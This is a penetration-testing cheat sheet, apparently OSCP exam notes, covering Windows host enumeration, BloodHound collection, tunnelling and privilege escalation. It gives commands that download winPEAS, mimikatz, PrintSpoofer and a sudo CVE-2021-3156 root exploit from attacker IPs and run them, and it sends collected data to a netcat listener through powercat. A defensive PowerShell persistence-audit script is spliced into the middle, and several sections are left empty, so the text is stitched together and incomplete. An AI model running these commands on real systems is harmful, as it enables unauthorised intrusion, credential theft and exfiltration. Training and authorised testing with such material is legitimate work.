Post Exploitation
HOST ENUMERATION WINDOWS
General Information
User Information
Network Information
Interesting Locations
Explorer - View - Hidden items ( turn on "show hidden items" )
Check users' Documents, Downloads, Desktops
dir c:\windows\prefetch ( admin ) = see what executables have been run
dir /a:h
dir /o:d /t:w c:\windows\system32
dir /o:d /t:w c:\windows\system32\winevt\logs
dir /o:d /t:w c:\windows\temp
reg query hklm\software\microsoft\windows\currentversion\run /s (don't forget about hkcu) and runonce
Process and Services
tasklist /v
tasklist /svc
tasklist /svc | findstr /i "PID"
services.msc ( gui )
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a
sc query <service name>
schtasks
Task Scheduler ( gui )
schtasks /query /fo LIST /v
schtasks /query
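The Run/RunOnce and service enumeration above is done by hand; the following PowerShell audit script (added here, not part of the original notes) collects the same artefacts (Run and RunOnce keys under HKLM and HKCU, and services whose binary lives outside System32) and diffs them against a saved baseline so that newly added persistence entries stand out. The baseline file location is an assumption.

```powershell
# Inventory of autorun keys and non-System32 services: the same items the
# manual reg query / wmic commands above list, gathered into objects.
function Get-PersistenceInventory {
    $items = @()
    $runKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, ...
            $items += [pscustomobject]@{ Type = 'Autorun'; Name = "$key\$($p.Name)"; Path = [string]$p.Value }
        }
    }
    # Services whose image path is outside System32 (same filter as the wmic one-liner)
    $svcs = Get-CimInstance Win32_Service | Where-Object { $_.PathName -and $_.PathName -notmatch '(?i)\\system32\\' }
    foreach ($s in $svcs) {
        $items += [pscustomobject]@{ Type = 'Service'; Name = $s.Name; Path = $s.PathName }
    }
    return $items
}

# First run writes a baseline; later runs report entries that appeared or vanished.
function Compare-PersistenceBaseline {
    param([string]$BaselinePath = "$env:ProgramData\persistence-baseline.json")  # assumed location
    $current = @(Get-PersistenceInventory)
    if (-not (Test-Path $BaselinePath)) {
        $current | ConvertTo-Json -Depth 3 | Set-Content -Path $BaselinePath
        Write-Output "Baseline written to $BaselinePath ($($current.Count) entries)"
        return
    }
    $baseline = @(Get-Content -Raw $BaselinePath | ConvertFrom-Json | Where-Object { $_ })
    if ($baseline.Count -eq 0) { $diff = $current | ForEach-Object { $_ | Add-Member -NotePropertyName SideIndicator -NotePropertyValue '=>' -PassThru } }
    else { $diff = Compare-Object -ReferenceObject $baseline -DifferenceObject $current -Property Type, Name, Path }
    foreach ($d in $diff) {
        $tag = if ($d.SideIndicator -eq '=>') { 'NEW' } else { 'REMOVED' }
        Write-Output ("[{0}] {1}: {2} -> {3}" -f $tag, $d.Type, $d.Name, $d.Path)
    }
}

Compare-PersistenceBaseline
```

Run once on a known-good host to create the baseline, then schedule it; any NEW line is an autorun or service that was not present when the baseline was taken.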
SharpHound Collection
On Kali:
On Target:
Bypass execution policy
Import module
Execute:
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public\ -OutputPrefix "oscp.exam_Audit" -ZipFilename oscp.exam_Audit.zip
Setup Bloodhound
Using Powercat to Transfer Files:
On Kali:
locate powercat.ps1
cp /usr/share/windows-resources/powercat/powercat.ps1 .
nc -nvlp 4444 > NAME.zip
On Windows:
powershell iwr -uri http://IP/powercat.ps1 -Outfile C:\Users\Public\powercat.ps1
. C:\Users\Public\powercat.ps1
powercat -c IP -p 4444 -i C:\Users\Public\AUDIT.zip -v
Setup Tunnel
On Kali ( if not already done ):
https://github.com/jpillora/chisel/releases/tag/v1.7.7
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz -O chisel.gz
gzip -dk chisel.gz
mv chisel chisel.exe
Host Chisel on Kali
Connect from Target:
Download File:
Execute:
Example Proxychains Conf
On Kali: your proxychains should be default.
cat /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
WinPEAS Script
On Kali:
We grab a winpeasx64.exe and mimikatz since we know from systeminfo it's x64.
locate winpeas
cp /usr/share/peass/winpeas/winPEASx64.exe .
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
webup or load in ~/pwnshare/tools and use WebDAV
On Target:
powershell iwr -uri http://192.168.49.123/winPEASx64.exe -Outfile C:\Users\Public\winPEASx64.exe
Run it:
C:\Users\Public\winPEASx64.exe
Print Spoofer
On Kali:
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer64.exe
On Target:
powershell iwr -uri http://192.168.49.123/PrintSpoofer64.exe -Outfile C:\Users\Public\PrintSpoofer64.exe
Run it:
C:\Users\Public\PrintSpoofer64.exe
Check SUIDs but nothing interesting.
Sudo 1.8.31 Exploit - CVE-2021-3156
https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
curl http://192.168.45.233:8088/shellcode.c -o shellcode.c
curl http://192.168.45.233:8088/exploit.c -o exploit.c
curl http://192.168.45.233:8088/Makefile -o Makefile
make
./exploit